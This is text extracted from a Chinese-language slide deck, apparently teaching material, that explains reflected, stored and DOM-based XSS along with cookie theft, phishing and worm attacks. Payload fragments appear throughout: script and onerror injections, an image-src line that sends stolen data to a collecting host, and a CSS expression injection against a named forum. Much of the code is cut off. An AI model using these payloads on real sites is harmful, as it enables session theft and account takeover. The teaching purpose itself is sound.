XSS跨站脚本攻击解读课件.ppt
《XSS跨站脚本攻击解读课件.ppt》由会员分享,可在线阅读,更多相关《XSS跨站脚本攻击解读课件.ppt(87页珍藏版)》请在三一办公上搜索。
1、,XSS跨站脚本攻击,主要内容,XSS跨站脚本攻击定义,01,XSS跨站脚本攻击类型,02,XSS跨站脚本攻击漏洞挖掘,04,如何防范XSS跨站脚本攻击漏洞,05,XSS跨站脚本攻击方式与实例,03,XSS定义,跨站脚本攻击(Cross Site Scripting)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。为了与层叠样式表(Cascading Style Sheets)的缩写CSS区分开,跨站脚本攻击通常简写为XSS。,XSS,欢迎您, .$username
2、.!;?代码的主要作用是获取用户输入的参数作为用户名,并在页面中显示“欢迎您,XXX”的形式,XSS,http:/localhost/test.php?name=张三,XSS,http:/localhost/test.php?name=alert(/我的名字是张三/),XSS类型,反射型XSS存储型XSSDOM Based XSS,反射型XSS,反射型XSS只是简单地将用户输入的数据直接或未经过完善的安全过滤就在浏览器中进行输出,导致输出的数据中存在可被浏览器执行的代码数据。由于此种类型的跨站代码存在于URL中,所以黑客通常需要通过诱骗或加密变形等方式将存在恶意代码的链接发给用户,只有用户点击
3、以后才能使得攻击成功实施。,反射型XSS,反射型XSS是最为常见的一种XSS类型,反射型XSS,反射型XSS,反射型XSS,反射型XSS,反射型XSS,反射型XSS,存储型XSS,存储型XSS脚本攻击是指由于Web应用程序对用户输入数据的不严格,导致Web应用程序将黑客输入的恶意跨站攻击数据信息保存在服务端的数据库或其他文件形式中,当网页进行数据查询展示时,会从数据库中获取数据内容,并将数据内容在网页中进行输出展示,进而导致跨站脚本代码的执行。,存储型XSS,存储型XSS脚本攻击最为常见的场景就是在留言板、博客或新闻发布系统中,恶意代码的数据信息直接写入文章、评论、留言中,浏览时即会执行相应的
4、脚本代码。,存储型XSS,存储型XSS,Bo-Blog早期版本评论部分的存储型XSS,DOM Based XSS,基于DOM的XSS跨站脚本攻击是通过修改页面DOM节点数据信息而形成的XSS跨站脚本攻击。不同于反射型XSS和存储型XSS,基于DOM的XSS跨站脚本攻击往往需要针对具体的Javascript DOM代码进行分析,并根据实际情况进行XSS跨站脚本攻击的利用。,DOM Based XSS,DOM Based XSS,http:/,DOM Based XSS,# onerror=javascript:alert(/DOM Based XSS Test/),DOM Based XSS,D
5、OM Based XSS,DOM Based XSS,XSS攻击方式与实例,XSS攻击方式绝不是弹窗这么简单,XSS攻击方式与实例,XSS偷取用户信息XSS盗取CookieXSS钓鱼攻击XSS蠕虫攻击,XSS偷取用户信息,http:/192.168.10.62/U8Portal/Desktopdefault.aspx?serialNo=,XSS偷取用户信息,XSS偷取用户信息,(未完待续),XSS偷取用户信息,(完),XSS偷取用户信息,http:/192.168.10.62/U8Portal/Desktopdefault.aspx?serialNo=,XSS偷取用户信息,收取XSS偷取到的用
6、户信息浏览器的同源策略相同协议http:/https:/相同域名http:/http:/相同端口http:/http:/:8080跨域提交img=new Image();img.src=http:/,XSS偷取用户信息,如何诱骗对方?URL编码变形?短链接变形?隐藏在其他页面中?.,XSS盗取Cookie,对某个钓鱼网站的XSS攻击测试,XSS盗取Cookie,XSS盗取Cookie,XSS盗取Cookie,XSS盗取Cookie,XSS盗取Cookie,XSS钓鱼攻击,以盛大论坛的跨站钓鱼攻击演示。首先需要了解的就是,盛大的游戏登陆都是使用盛大通行证进行登录的,而盛大的论坛也是使用盛大通行证
7、进行登录,所以如果黑客通过盗取用户登录论坛时的信息,就相当于盗取了用户的账号和密码,盛大的论坛就存在XSS漏洞,使得黑客可以通过XSS钓鱼攻击方式获取用户的账号和密码,XSS钓鱼攻击,存在过滤不严的位置为用户资料中的个人主页部分。urlhttp:/ STYLE=a:expression(document.write() target=_blank/url然后利用插入代码的账号在论坛中发帖子或回复,当别的用户访问该账号发布或回复的帖子时,就会执行插入的恶意代码。http:/,XSS钓鱼攻击,XSS钓鱼攻击,XSS蠕虫攻击,XSS蠕虫的破坏力和影响力都是巨大的。XSS蠕虫主要发生在用户之间存在交互
8、行为的页面中,当Web应用程序对用户输入的数据信息没有做严格的过滤时,通过结合Ajax的异步提交,就可以实现在植入恶意代码的同时,将恶意代码进行对外发送,即实现了代码的感染和传播,也就形成了XSS蠕虫。,XSS蠕虫攻击,出现最早、最出名的XSS蠕虫攻击事件MySpace的Samy XSS蠕虫攻击事件MySpace是全球互联网上最大的个人空间,是以SNS为基础的娱乐平台,也是全球最大的在线交友平台,通过MySpace用户可以很容易地建立属于自己的个性空间,上传照片,发表日志,还可以分享其他人发布的相关信息等。MySpace也支持交友功能,好友信息会显示在个人空间的好友列表中,但是,如果想通过My
9、Space添加其他人为自己的好友,需要得到对方的验证通过才可以。2005年10月,一个名叫Samy的人在网上发布了一片文章,在文章中他说找到了一种方法可以借助MySpace网站自身存在的漏洞实现自动化添加自己到别人的空间中,并且经过他测试这种方法,在3个小时内,添加了2429个好友,同时收到了6373个来自MySpace上其他人添加自己为好友的请求,由此而导致了大量的恶意数据和垃圾信息在MySpace上传播,对网站和用户都造成了巨大的损失。,XSS蠕虫攻击,我国曾经爆发过的典型XSS蠕虫攻击事件百度XSS蠕虫攻击人人XSS蠕虫攻击搜狐XSS蠕虫攻击新浪微博XSS蠕虫攻击.,XSS蠕虫攻击,百度
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- XSS 脚本 攻击 解读 课件
链接地址:https://www.31ppt.com/p-1481631.html